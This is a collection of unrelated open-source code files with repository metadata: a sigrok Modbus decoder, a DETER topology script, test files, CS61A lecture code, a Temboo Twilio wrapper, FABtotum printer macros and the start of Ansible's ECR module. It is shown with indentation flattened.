self.puti(0, 'server-id', message)
function = data[1].data
if function >= 1 and function <= 4:
self.parse_read_data_command()
if function == 5:
self.parse_write_single_coil()
if function == 6:
self.parse_write_single_register()
if function in {7, 11, 12, 17}:
self.parse_single_byte_request()
elif function == 8:
self.parse_diagnostics()
if function in {15, 16}:
self.parse_write_multiple()
elif function == 22:
self.parse_mask_write_register()
elif function == 23:
self.parse_read_write_registers()
elif function in {21, 21, 24, 43}:
self.parse_not_implemented()
else:
self.puti(1, 'error',
'Unknown function: {}'.format(data[1].data))
self.putl('error', 'Unknown function')
# If the message gets here without raising an exception, the
# message goes on longer than it should.
self.putl('error', 'Message too long')
except No_more_data:
# Just a message saying we don't need to parse anymore this round.
pass
def parse_read_data_command(self):
'''Interpret a command to read x units of data starting at address, ie
functions 1, 2, 3 and 4, and write the result to the annotations.'''
data = self.data
self.minimum_length = 8
function = data[1].data
functionname = {1: 'Read Coils',
2: 'Read Discrete Inputs',
3: 'Read Holding Registers',
4: 'Read Input Registers',
}[function]
self.puti(1, 'function',
'Function {}: {}'.format(function, functionname))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convienience.
# Example: holding register 60 becomes 30061.
address_name = 10000 * function + 1 + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
self.puti(5, 'length',
'Read {:d} units of data'.format(self.half_word(4)))
self.check_crc(7)
def parse_single_byte_request(self):
'''Some Modbus functions have no arguments, this parses those.'''
function = self.data[1].data
function_name = {7: 'Read Exception Status',
11: 'Get Comm Event Counter',
12: 'Get Comm Event Log',
17: 'Report Slave ID',
}[function]
self.puti(1, 'function',
'Function {}: {}'.format(function, function_name))
self.check_crc(3)
def parse_write_multiple(self):
'''Function 15 and 16 are almost the same, so we can parse them both
using one function.'''
self.mimumum_length = 9
function = self.data[1].data
if function == 15:
data_unit = 'Coils'
max_outputs = 0x07B0
ratio_bytes_data = 1/8
long_address_offset = 10001
elif function == 16:
data_unit = 'Registers'
max_outputs = 0x007B
ratio_bytes_data = 2
long_address_offset = 30001
self.puti(1, 'function',
'Function {}: Write Multiple {}'.format(function, data_unit))
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convienience.
address_name = long_address_offset + starting_address
self.puti(3, 'address',
'Start at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(4)
if quantity_of_outputs <= max_outputs:
self.puti(5, 'length',
'Write {} {}'.format(quantity_of_outputs, data_unit))
else:
self.puti(5, 'error',
'Bad value: {} {}. Max is {}'.format(quantity_of_outputs,
data_unit, max_outputs))
proper_bytecount = ceil(quantity_of_outputs * ratio_bytes_data)
bytecount = self.data[6].data
if bytecount == proper_bytecount:
self.puti(6, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(6, 'error',
'Bad byte count, is {}, should be {}'.format(bytecount,
proper_bytecount))
self.mimumum_length = bytecount + 9
self.putl('data', 'Value 0x{:X}', 6 + bytecount)
self.check_crc(bytecount + 8)
def parse_read_file_record(self):
self.puti(1, 'function', 'Function 20: Read file records')
data = self.data
bytecount = data[2].data
self.minimum_length = 5 + bytecount
# 1 for serverID, 1 for function, 1 for bytecount, 2 for CRC.
if 0x07 <= bytecount <= 0xF5:
self.puti(2, 'length', 'Request is {} bytes long'.format(bytecount))
else:
self.puti(2, 'error',
'Request claims to be {} bytes long, legal values are between'
' 7 and 247'.format(bytecount))
current_byte = len(data) - 1
# Function 20 is a number of sub-requests, the first starting at 3,
# the total length of the sub-requests is bytecount.
if current_byte <= bytecount + 2:
step = (current_byte - 3) % 7
if step == 0:
if data[current_byte].data == 6:
self.puti(current_byte, 'data', 'Start sub-request')
else:
self.puti(current_byte, 'error',
'First byte of subrequest should be 0x06')
elif step == 1:
raise No_more_data
elif step == 2:
file_number = self.half_word(current_byte - 1)
self.puti(current_byte, 'data',
'Read File number {}'.format(file_number))
elif step == 3:
raise No_more_data
elif step == 4:
record_number = self.half_word(current_byte - 1)
self.puti(current_byte, 'address',
'Read from record number {}'.format(record_number))
# TODO: Check if within range.
elif step == 5:
raise No_more_data
elif step == 6:
records_to_read = self.half_word(current_byte - 1)
self.puti(current_byte, 'length',
'Read {} records'.format(records_to_read))
self.check_crc(4 + bytecount)
def parse_read_write_registers(self):
'''Parse function 23: Read/Write multiple registers.'''
self.minimum_length = 13
self.puti(1, 'function', 'Function 23: Read/Write Multiple Registers')
starting_address = self.half_word(2)
# Some instruction manuals use a long form name for addresses, this is
# listed here for convienience.
# Example: holding register 60 becomes 30061.
address_name = 30001 + starting_address
self.puti(3, 'address',
'Read starting at address 0x{:X} / {:d}'.format(starting_address,
address_name))
self.puti(5, 'length', 'Read {:d} units of data'.format(self.half_word(4)))
starting_address = self.half_word(6)
self.puti(7, 'address',
'Write starting at address 0x{:X} / {:d}'.format(starting_address,
address_name))
quantity_of_outputs = self.half_word(8)
self.puti(9, 'length',
'Write {} registers'.format(quantity_of_outputs))
proper_bytecount = quantity_of_outputs * 2
bytecount = self.data[10].data
if bytecount == proper_bytecount:
self.puti(10, 'length', 'Byte count: {}'.format(bytecount))
else:
self.puti(10, 'error',
'Bad byte count, is {}, should be {}'.format(bytecount,
proper_bytecount))
self.mimumum_length = bytecount + 13
self.putl('data', 'Data, value 0x{:02X}', 10 + bytecount)
self.check_crc(bytecount + 12)
class Decoder(srd.Decoder):
api_version = 3
id = 'modbus'
name = 'Modbus'
longname = 'Modbus RTU over RS232/RS485'
desc = 'Modbus RTU protocol for industrial applications.'
license = 'gplv3+'
inputs = ['uart']
outputs = ['modbus']
tags = ['Embedded/industrial']
annotations = (
('sc-server-id', ''),
('sc-function', ''),
('sc-crc', ''),
('sc-address', ''),
('sc-data', ''),
('sc-length', ''),
('sc-error', ''),
('cs-server-id', ''),
('cs-function', ''),
('cs-crc', ''),
('cs-address', ''),
('cs-data', ''),
('cs-length', ''),
('cs-error', ''),
('error-indication', ''),
)
annotation_rows = (
('sc', 'Server->client', (0, 1, 2, 3, 4, 5, 6)),
('cs', 'Client->server', (7, 8, 9, 10, 11, 12, 13)),
('error-indicator', 'Errors in frame', (14,)),
)
options = (
{'id': 'scchannel', 'desc': 'Server -> client channel',
'default': rxtx_channels[0], 'values': rxtx_channels},
{'id': 'cschannel', 'desc': 'Client -> server channel',
'default': rxtx_channels[1], 'values': rxtx_channels},
{'id': 'framegap', 'desc': 'Inter-frame bit gap', 'default': 28},
)
def __init__(self):
self.reset()
def reset(self):
self.ADUSc = None # Start off with empty slave -> client ADU.
self.ADUCs = None # Start off with empty client -> slave ADU.
# The reason we have both (despite not supporting full duplex comms) is
# because we want to be able to decode the message as both client ->
# server and server -> client, and let the user see which of the two
# the ADU was.
self.bitlength = None # We will later test how long a bit is.
def start(self):
self.out_ann = self.register(srd.OUTPUT_ANN)
def puta(self, start, end, ann_str, message):
'''Put an annotation from start to end, with ann as a
string. This means you don't have to know the ann's
number to write annotations to it.'''
ann = [s[0] for s in self.annotations].index(ann_str)
self.put(start, end, self.out_ann, [ann, [message]])
def decode_adu(self, ss, es, data, direction):
'''Decode the next byte or bit (depending on type) in the ADU.
ss: Start time of the data
es: End time of the data
data: Data as passed from the UART decoder
direction: Is this data for the Cs (client -> server) or Sc (server ->
client) being decoded right now?'''
ptype, rxtx, pdata = data
# We don't have a nice way to get the baud rate from UART, so we have
# to figure out how long a bit lasts. We do this by looking at the
# length of (probably) the startbit.
if self.bitlength is None:
if ptype == 'STARTBIT' or ptype == 'STOPBIT':
self.bitlength = es - ss
else:
# If we don't know the bitlength yet, we can't start decoding.
return
# Select the ADU, create the ADU if needed.
# We set ADU.startNewFrame = True when we know the old one is over.
if direction == 'Sc':
if (self.ADUSc is None) or self.ADUSc.startNewFrame:
self.ADUSc = Modbus_ADU_SC(self, ss, TX, 'sc-')
ADU = self.ADUSc
if direction == 'Cs':
if self.ADUCs is None or self.ADUCs.startNewFrame:
self.ADUCs = Modbus_ADU_CS(self, ss, TX, 'cs-')
ADU = self.ADUCs
# We need to determine if the last ADU is over.
# According to the Modbus spec, there should be 3.5 characters worth of
# space between each message. But if within a message there is a length
# of more than 1.5 character, that's an error. For our purposes
# somewhere between seems fine.
# A character is 11 bits long, so (3.5 + 1.5)/2 * 11 ~= 28
# TODO: Display error for too short or too long.
if (ss - ADU.last_read) <= self.bitlength * self.options['framegap']:
ADU.add_data(ss, es, data)
else:
# It's been too long since the last part of the ADU!
# If there is any data in the ADU we need to show it to the user
if len(ADU.data) > 0:
# Extend errors for 3 bits after last byte, we can guarantee
# space.
ADU.close(ADU.data[-1].end + self.bitlength * 3)
ADU.startNewFrame = True
# Restart this function, it will make a new ADU for us.
self.decode_adu(ss, es, data, direction)
def decode(self, ss, es, data):
ptype, rxtx, pdata = data
# Decide what ADU(s) we need this packet to go to.
# Note that it's possible to go to both ADUs.
if rxtx_channels[rxtx] == self.options['scchannel']:
self.decode_adu(ss, es, data, 'Sc')
if rxtx_channels[rxtx] == self.options['cschannel']:
self.decode_adu(ss, es, data, 'Cs')
|
Entropy512/libsigrokdecode
|
decoders/modbus/pd.py
|
Python
|
gpl-3.0
| 37,104
|
#!/usr/bin/env python
from deter import topdl
subs = [ ]
elems = [ ]
for i in range(0,2):
print i
subs.append(topdl.Substrate(name='link'+str(i)))
print subs
clients = ('client1','client2')
for index,elem_name in enumerate(clients):
inf = topdl.Interface(name='inf000', substrate=['link'+str(index)])
elem = topdl.Computer(name=elem_name, interface=[inf])
elem.set_attribute('containers:node_type','openvz');
elem.set_attribute('containers:partition',index);
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)
servers = ('server1')
for index in xrange(len(clients)):
inf = topdl.Interface(name='inf'+str(format(index,'03d)),substrate=['link'+str(index)])
elem = topdl.Computer(name='server1', interface = [inf])
elem.set_attribute('container:node_type','embedded_pnode');
elem.set_attribute('container:partition', len(clients)+1);
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)
"""elem = topdl.Computer(name='control')
elem.set_attribute('containers:node_type','embedded_pnode');
elem.set_attribute('containers:partition','1');
elem.set_attribute('startup','sudo python /share/magi/current/magi_bootstrap.py');
elems.append(elem)"""
top = topdl.Topology(substrates=subs, elements=elems)
f = open ('exp2.xml','w+')
f.write( topdl.topology_to_xml(top, top ='experiment'))
f.close()
#print topdl.topology_to_xml(top, top='experiment')
|
deter-project/magi
|
atscale/Containerization/exp1.py
|
Python
|
gpl-2.0
| 1,474
|
from __future__ import absolute_import
from .webhooks import WebHooksTestCase, GitlabWebHooksTestCase
from .gitlab import GitlabTestCase
from .util import UtilTestCase
from .redis import RedisModelTestCase
|
pipex/gitbot
|
tests/__init__.py
|
Python
|
apache-2.0
| 207
|
import zstackwoodpecker.test_state as ts_header
import os
TestAction = ts_header.TestAction
def path():
return dict(initial_formation="template5", checking_point=8, path_list=[
[TestAction.create_vm, 'vm1', 'flag=ceph'],
[TestAction.create_volume, 'volume1', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume1'],
[TestAction.create_volume, 'volume2', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume2'],
[TestAction.create_volume, 'volume3', 'flag=ceph,scsi'],
[TestAction.attach_volume, 'vm1', 'volume3'],
[TestAction.create_vm_snapshot, 'vm1', 'vm1-snapshot1'],
[TestAction.create_image_from_volume, 'vm1', 'vm1-image1'],
[TestAction.detach_volume, 'volume3'],
[TestAction.create_vm_snapshot, 'vm1', 'vm1-snapshot5'],
[TestAction.clone_vm, 'vm1', 'vm2'],
[TestAction.create_vm_snapshot, 'vm2', 'vm2-snapshot8'],
[TestAction.create_image_from_volume, 'vm1', 'vm1-image2'],
[TestAction.delete_volume, 'volume2'],
[TestAction.batch_delete_volume_snapshot, ['volume1-snapshot5','volume2-snapshot5',]],
[TestAction.delete_vm_snapshot, 'vm2-snapshot8'],
])
'''
The final status:
Running:['vm1', 'vm2']
Stopped:[]
Enadbled:['vm1-snapshot1', 'volume1-snapshot1', 'volume2-snapshot1', 'volume3-snapshot1', 'vm1-snapshot5', 'vm1-image1', 'vm1-image2']
attached:['volume1']
Detached:['volume3']
Deleted:['volume2', 'volume1-snapshot5', 'volume2-snapshot5', 'vm2-snapshot8']
Expunged:[]
Ha:[]
Group:
vm_snap1:['vm1-snapshot1', 'volume1-snapshot1', 'volume2-snapshot1', 'volume3-snapshot1']---vm1@volume1_volume2_volume3
'''
|
zstackio/zstack-woodpecker
|
integrationtest/vm/multihosts/vm_snapshots/paths/xc_path47.py
|
Python
|
apache-2.0
| 1,580
|
def str_repr_demos():
from fractions import Fraction
half = Fraction(1, 2)
half
print(half)
str(half)
repr(half)
s = 'hello world'
str(s)
repr(s)
"'hello world'"
repr(repr(repr(s)))
eval(eval(eval(repr(repr(repr(s))))))
# Errors: eval('hello world')
# Implementing generic string functions
class Bear:
"""A Bear."""
def __init__(self):
self.__repr__ = lambda: 'oski'
self.__str__ = lambda: 'oski the bear'
def __repr__(self):
return 'Bear()'
def __str__(self):
return 'a bear'
def print_bear():
oski = Bear()
print(oski)
print(str(oski))
print(repr(oski))
print(oski.__repr__())
print(oski.__str__())
def repr(x):
return type(x).__repr__(x)
def str(x):
t = type(x)
if hasattr(t, '__str__'):
return t.__str__(x)
else:
return repr(x)
print_bear()
# Ratio numbers
class Ratio:
"""A mutable ratio.
>>> f = Ratio(9, 15)
>>> f
Ratio(9, 15)
>>> print(f)
9/15
>>> f.gcd
3
>>> f.numer = 6
>>> f.denom
10
>>> f.gcd
2
>>> f
Ratio(6, 10)
>>> f.denom = 5
>>> f
Ratio(3, 5)
>>> Ratio(1, 3) + Ratio(1, 6)
Ratio(1, 2)
>>> f + 1
Ratio(8, 5)
>>> 1 + f
Ratio(8, 5)
>>> 1.4 + f
2.0
"""
def __init__(self, n, d):
self.gcd = gcd(n, d)
self._numer = n // self.gcd
self._denom = d // self.gcd
def __repr__(self):
return 'Ratio({0}, {1})'.format(self.numer, self.denom)
def __str__(self):
return '{0}/{1}'.format(self.numer, self.denom)
def __add__(self, other):
if isinstance(other, Ratio):
n = self.numer * other.denom + self.denom * other.numer
d = self.denom * other.denom
elif isinstance(other, int):
n = self.numer + self.denom * other
d = self.denom
else:
return float(self) + other
r = Ratio(n, d)
r.gcd = 1
return r
__radd__ = __add__
def __float__(self):
return self.numer / self.denom
@property
def numer(self):
return self._numer * self.gcd
@property
def denom(self):
return self._denom * self.gcd
@numer.setter
def numer(self, value):
assert value % self._numer == 0
self.gcd = value // self._numer
@denom.setter
def denom(self, value):
assert value % self._denom == 0
self.gcd = value // self._denom
def gcd(x, y):
"""Return the greatest common divisor of integers x & y.
>>> gcd(12, 8)
4
"""
while x != y:
x, y = abs(x-y), min(x, y)
return x
|
tavaresdong/courses-notes
|
ucb_cs61A/lectures/16.py
|
Python
|
mit
| 2,731
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ListPhoneNumbers
# Returns a list of Twilio phone numbers purchased from Twilio or ported to Twilio.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListPhoneNumbers(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListPhoneNumbers Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListPhoneNumbers, self).__init__(temboo_session, '/Library/Twilio/IncomingPhoneNumbers/ListPhoneNumbers')
def new_input_set(self):
return ListPhoneNumbersInputSet()
def _make_result_set(self, result, path):
return ListPhoneNumbersResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListPhoneNumbersChoreographyExecution(session, exec_id, path)
class ListPhoneNumbersInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListPhoneNumbers
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccountSID(self, value):
"""
Set the value of the AccountSID input for this Choreo. ((required, string) The AccountSID provided when you signed up for a Twilio account.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('AccountSID', value)
def set_AuthToken(self, value):
"""
Set the value of the AuthToken input for this Choreo. ((required, string) The authorization token provided when you signed up for a Twilio account.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('AuthToken', value)
def set_FriendlyName(self, value):
"""
Set the value of the FriendlyName input for this Choreo. ((optional, string) Only return the incoming phone number resources with friendly names that exactly match this name.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('FriendlyName', value)
def set_PageSize(self, value):
"""
Set the value of the PageSize input for this Choreo. ((optional, integer) The number of results per page.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('PageSize', value)
def set_Page(self, value):
"""
Set the value of the Page input for this Choreo. ((optional, integer) The page of results to retrieve. Defaults to 0.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('Page', value)
def set_PhoneNumber(self, value):
"""
Set the value of the PhoneNumber input for this Choreo. ((optional, string) Only return the incoming phone number resources that match this pattern. You can specify partial numbers and use '*' as a wildcard for any digit.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('PhoneNumber', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: json (the default) and xml.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('ResponseFormat', value)
def set_SubAccountSID(self, value):
"""
Set the value of the SubAccountSID input for this Choreo. ((optional, string) The SID of the subaccount associated with the list of phone numbers. If not specified, the main AccountSID used to authenticate is used in the request.)
"""
super(ListPhoneNumbersInputSet, self)._set_input('SubAccountSID', value)
class ListPhoneNumbersResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListPhoneNumbers Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Twilio.)
"""
return self._output.get('Response', None)
class ListPhoneNumbersChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListPhoneNumbersResultSet(response, path)
|
jordanemedlock/psychtruths
|
temboo/core/Library/Twilio/IncomingPhoneNumbers/ListPhoneNumbers.py
|
Python
|
apache-2.0
| 5,238
|
#!/bin/env python
# -*- coding: utf-8; -*-
#
# (c) 2016 FABtotum, http://www.fabtotum.com
#
# This file is part of FABUI.
#
# FABUI is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# FABUI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FABUI. If not, see <http://www.gnu.org/licenses/>.
__authors__ = "Marco Rizzuto, Daniel Kesler, Krios Mane"
__license__ = "GPL - https://opensource.org/licenses/GPL-3.0"
__version__ = "1.0"
# Import standard python module
import re
# Import external modules
# Import internal modules
from fabtotum.fabui.macros.common import getEeprom, configure_head, configure_feeder, configure_4thaxis, get_versions, getPosition, set_lights, getTemperature
from fabtotum.utils.translation import _, setLanguage
from fabtotum.fabui.constants import *
def home_all(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
zprobe_disabled = int(app.config.get('settings', 'probe.enable')) == 0
z_max_offset = app.config.get('settings', 'z_max_offset')
except KeyError:
z_max_offset = Z_MAX_OFFSET
zprobe_disabled = False
app.trace( _("Homing all axes") )
app.macro("G90", "ok", 2, _("Setting abs position"), verbose=False)
if zprobe_disabled :
app.macro("G27", "ok", 200, _("Homing all axes"), verbose=False)
app.macro('G92 Z{0}'.format(z_max_offset), "ok", 99, _("Set Z Max"), verbose=False)
app.macro("G0 Z50 F10000", "ok", 120, _("Raising"), verbose=False)
app.macro("M400", "ok", 120, _("Waiting for all moves to finish"), verbose=False)
else:
app.macro("G28", "ok", 200, _("Homing all axes"), verbose=False)
def start_up(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
color = app.config.get('settings', 'color')
except KeyError:
color = {
'r' : 255,
'g' : 255,
'b' : 255,
}
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
try:
switch = app.config.get('settings', 'switch')
except KeyError:
switch = 0
try:
collision_warning = app.config.get('settings', 'safety')['collision-warning']
except KeyError:
collision_warning = 0
app.trace( _("Starting up") )
app.macro("M728", "ok", 2, _("Alive!"), verbose=False)
app.macro("M402", "ok", 1, _("Probe Up") )
app.macro("M701 S"+str(color['r']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M702 S"+str(color['g']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M703 S"+str(color['b']), "ok", 2, _("Turning on lights"), verbose=False)
app.macro("M732 S"+str(safety_door),"ok", 2, _("Safety Settings"), verbose=False)
app.macro("M714 S"+str(switch), "ok", 2, _("Homing direction"), verbose=False)
app.macro("M734 S"+str(collision_warning), "ok", 2, _("Machine Limits Collision warning"), verbose=False)
def shutdown(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
installed_head = app.config.get_current_head_info()
temps = getTemperature(app)
min_temperature = 70
app.trace( _("Shutting down...") )
if "print" in installed_head['capabilities'] and (float(temps['T']) > min_temperature ):
app.macro("M104 S{0}".format(min_temperature), "ok", 5, _("Cooling down nozzle temperature") )
app.macro("M109 S{0}".format(min_temperature), "*", 400, _("Waiting for nozzle to reach temperature (<span class='top-bar-nozzle-actual'>-</span> / {0}°)".format(min_temperature)) ) #heating and waiting.
app.trace( _("Nozzle cooled") )
app.macro("M300", "ok", 5, _("Play alert sound!"), verbose=False)
app.macro("M729", "ok", 2, _("Asleep!"), verbose=False)
def auto_bed_leveling(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.trace( _("Auto Bed leveling Initialized") )
app.macro("G28", "ok", 120, _("Homing Z axis") )
app.macro("G28 X Y", "ok", 90, _("Homing X/Y axis") )
app.macro("G29", "ok", 150, _("Probing the bed") )
def probe_down(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.macro("M401", "ok", 1, _("Probe Down") )
def probe_up(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
app.macro("M402", "ok", 1, _("Probe Up") )
def safe_zone(app, args = None, lang='en_US.UTF-8'):
""" .. todo: turn these into macroes """
setLanguage(lang)
pass
#~ app.send("G91")
#~ app.send("G0 E-5 F1000")
#~ app.send("G0 Z+1 F1000")
#~ app.send("G90")
#~ app.send("G27 Z0")
#~ app.send("G0 X210 Y210")
def engage_4axis(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
app.trace( _("Checking safety measures") )
if safety_door == 1:
app.macro("M741", "TRIGGERED", 2, _("Front panel door opened"), verbose=False )
feeder = app.config.get_feeder_info('built_in_feeder')
units_a = feeder['steps_per_angle']
try:
feeder_disengage_offset = app.config.get('settings', 'feeder')['disengage_offset']
except KeyError:
feeder_disengage_offset = 2
app.trace( _("Engaging 4th Axis") )
app.macro("G27", "ok", 100, _("Zeroing Z axis") )
app.macro("G91", "ok", 1, _("Setting rel position"), verbose=False)
app.macro("M120", "ok", 1, _("Disable endstop checking") )
app.macro("G0 Z+"+str(feeder_disengage_offset)+" F300", "ok", 90, _("Engaging 4th Axis") )
#app.macro("M400", "ok", 5, _("Waiting for all moves to finish"), verbose=False)
app.macro("M121", "ok", 1, _("Enable endstop checking") )
app.macro("M92 E"+str(units_a), "ok", 1, _("Setting 4th axis mode") )
app.macro("G92 Z241", "ok", 1, _("Setting Z position"), verbose=False)
app.macro("G90", "ok", 1, _("Setting abs position"), verbose=False)
app.macro("G0 Z234", "ok", 1, _("Check position"), verbose=False)
app.macro("M300", "ok", 3, _("Play beep sound"), verbose=False)
def do_4th_axis_mode(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
feeder = get_feeder_info('built_in_feeder')
units_a = feeder['steps_per_angle']
app.macro("M92 E"+str(units_a), "ok", 1, _("Setting 4th axis mode"), verbose=False)
def version(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return get_versions(app, lang)
def set_ambient_color(app, args = None, lang='en_US.UTF-8'):
return set_lights(app, args, lang)
def install_head(app, args, lang='en_US.UTF-8'):
setLanguage(lang)
head_name = args[0]
result = configure_head(app, head_name, lang)
# app.trace(_("Restarting totumduino"))
return result
def install_feeder(app, args, lang='en_US.UTF-8'):
feeder_name = args[0]
result = configure_feeder(app, feeder_name, lang)
return result
def install_4thaxis(app, args, lang='en_US.UTF-8'):
fourthaxis_name = args[0]
result = configure_4thaxis(app, fourthaxis_name, lang)
return result
def clear_errors(app, args = None, lang='en_US.UTF-8'):
app.macro("M999", "ok", 5, _("Clearing error state"), verbose=False)
app.macro("M728", "ok", 5, _("Awaken"), verbose=False)
def read_eeprom(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return getEeprom(app, lang)
def read_position(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
return getPosition(app, lang)
def door_safety(app, args = None, lang='en_US.UTF-8'):
setLanguage(lang)
try:
safety_door = app.config.get('settings', 'safety')['door']
except KeyError:
safety_door = 0
app.trace( _("Checking safety measures") )
if safety_door == 1:
app.macro("M741", "TRIGGERED", 2, _("Front panel door opened"), verbose=False )
|
FABtotum/colibri-fabui
|
fabui/ext/py/fabtotum/fabui/macros/general.py
|
Python
|
gpl-2.0
| 8,809
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_ecr
version_added: "2.3"
short_description: Manage Elastic Container Registry repositories
description:
- Manage Elastic Container Registry repositories
options:
name:
description:
- the name of the repository
required: true
registry_id:
description:
- AWS account id associated with the registry.
- If not specified, the default registry is assumed.
required: false
policy:
description:
- JSON or dict that represents the new policy
required: false
force_set_policy:
description:
- if no, prevents setting a policy that would prevent you from
setting another policy in the future.
required: false
default: false
delete_policy:
description:
- if yes, remove the policy from the repository
required: false
default: false
state:
description:
- create or destroy the repository
required: false
choices: [present, absent]
default: 'present'
author:
- David M. Lee (@leedm777)
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# If the repository does not exist, it is created. If it does exist, would not
# affect any policies already on it.
- name: ecr-repo
ecs_ecr: name=super/cool
- name: destroy-ecr-repo
ecs_ecr: name=old/busted state=absent
- name: Cross account ecr-repo
ecs_ecr: registry_id=999999999999 name=cross/account
- name: set-policy as object
ecs_ecr:
name: needs-policy-object
policy:
Version: '2008-10-17'
Statement:
- Sid: read-only
Effect: Allow
Principal:
AWS: '{{ read_only_arn }}'
Action:
- ecr:GetDownloadUrlForLayer
- ecr:BatchGetImage
- ecr:BatchCheckLayerAvailability
- name: set-policy as string
ecs_ecr:
name: needs-policy-string
policy: "{{ lookup('template', 'policy.json.j2') }}"
- name: delete-policy
ecs_ecr:
name: needs-no-policy
delete_policy: yes
'''
RETURN = '''
state:
type: string
description: The asserted state of the repository (present, absent)
returned: always
created:
type: boolean
description: If true, the repository was created
returned: always
name:
type: string
description: The name of the repository
returned: "when state == 'absent'"
repository:
type: dict
description: The created or updated repository
returned: "when state == 'present'"
sample:
createdAt: '2017-01-17T08:41:32-06:00'
registryId: '999999999999'
repositoryArn: arn:aws:ecr:us-east-1:999999999999:repository/ecr-test-1484664090
repositoryName: ecr-test-1484664090
repositoryUri: 999999999999.dkr.ecr.us-east-1.amazonaws.com/ecr-test-1484664090
'''
import json
import time
import inspect
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def build_kwargs(registry_id):
"""
Builds a kwargs dict which may contain the optional registryId.
:param registry_id: Optional string containing the registryId.
:return: kwargs dict with registryId, if given
"""
if not registry_id:
return dict()
else:
return dict(registryId=registry_id)
class EcsEcr:
def __init__(self, module):
region, ec2_url, aws_connect_kwargs = \
get_aws_connection_info(module, boto3=True)
self.ecr = boto3_conn(module, conn_type='client',
resource='ecr', region=region,
endpoint=ec2_url, **aws_connect_kwargs)
self.check_mode = module.check_mode
self.changed = False
self.skipped = False
def get_repository(self, registry_id, name):
try:
res = self.ecr.describe_repositories(
repositoryNames=[name], **build_kwargs(registry_id))
repos = res.get('repositories')
return repos and repos[0]
except ClientError as err:
code = err.response['Error'].get('Code', 'Unknown')
if code == 'RepositoryNotFoundException':
return None
raise
def get_repository_policy(self, registry_id, name):
try:
res = self.ecr.get_repository_policy(
repositoryName=name, **build_kwargs(registry_id))
text = res.get('policyText')
return text and json.loads(text)
except ClientError as err:
code = err.response['Error'].get('Code', 'Unknown')
